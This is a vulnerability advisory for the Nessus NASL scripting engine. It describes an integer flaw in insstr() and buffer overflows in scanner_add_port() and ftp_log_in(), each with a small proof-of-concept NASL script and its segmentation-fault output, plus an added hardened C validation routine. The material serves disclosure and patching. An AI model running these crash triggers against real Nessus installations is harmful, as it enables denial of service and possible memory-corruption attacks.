Details
There exist several vulnerabilities in the NASL scripting engine. To exploit these flaws, an attacker would need to have a valid Nessus account as well as the ability to upload arbitrary Nessus plugins to the Nessus server (this option is disabled by default), or he/she would need to trick a user into running a specially crafted NASL script.
Note that these issues can NOT be exploited by a tested host to crash nessusd remotely.
* ISSUE 1 - Integer handling vulnerability in insstr() function
Vulnerability is triggered by a negative fourth argument:
$ cat t1.nasl
insstr("aaaaaaaaaaa", "bb", 3, 0xfffffffd);
$ nasl t1.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
[1384](t1.nasl) insstr: warning! 1st index 3 greater than 2nd index -3
Segmentation fault (core dumped)
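The crash above shows the engine noticing that the second index (0xfffffffd read as a signed 32-bit value, i.e. -3) is smaller than the first, yet still proceeding. The following C function is an added illustration of the validation such a routine should perform; it is not Nessus' own insstr() code, and its semantics (replace str[i1..i2] inclusive with ins, returning NULL on any out-of-range index) are an assumption made for the example.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical hardened insstr(): replaces str[i1..i2] (inclusive) with ins.
 * Returns a newly allocated string, or NULL when the indices are invalid.
 * The indices stay signed on purpose: a NASL value such as 0xfffffffd is
 * -3 once interpreted as a signed 32-bit int, so negatives must be rejected
 * explicitly rather than being compared as large unsigned offsets. */
char *insstr_checked(const char *str, const char *ins, long i1, long i2)
{
    if (str == NULL || ins == NULL)
        return NULL;
    long len = (long)strlen(str);
    /* Refuse every out-of-range case before any pointer arithmetic. */
    if (i1 < 0 || i2 < 0 || i1 > i2 || i2 >= len)
        return NULL;
    size_t ins_len = strlen(ins);
    size_t tail_len = (size_t)(len - (i2 + 1));
    size_t out_len = (size_t)i1 + ins_len + tail_len;
    char *out = malloc(out_len + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, str, (size_t)i1);                      /* head: str[0..i1) */
    memcpy(out + i1, ins, ins_len);                    /* replacement text  */
    memcpy(out + i1 + ins_len, str + i2 + 1, tail_len); /* tail: str(i2..]  */
    out[out_len] = '\0';
    return out;
}

/* Replays the advisory's call with the constructed value -3, the sign-extended
 * reading of 0xfffffffd; returns 1 when the call is rejected instead of crashing. */
int insstr_rejects_negative_index(void)
{
    long raw = -3;
    char *r = insstr_checked("aaaaaaaaaaa", "bb", 3, raw);
    int rejected = (r == NULL);
    free(r);
    return rejected;
}
```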
* ISSUE 2 - Buffer overflow in scanner_add_port() function
Overflow is triggered by very long 'proto' argument:
$ cat t2.nasl
scanner_add_port(port : 80, proto : crap(data:'A', length:300));
$ nasl t2.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)
* ISSUE 3 - Buffer overflow in ftp_log_in() function
Overflow is triggered by very long 'user'/'pass' arguments:
$ cat t3.nasl
ftp_log_in(socket : open_sock_tcp(21), pass : "11", user: crap(data:'A',length:8192));
$ nasl t3.nasl
** WARNING : packet forgery will not work
** as NASL is not running as root
Segmentation fault (core dumped)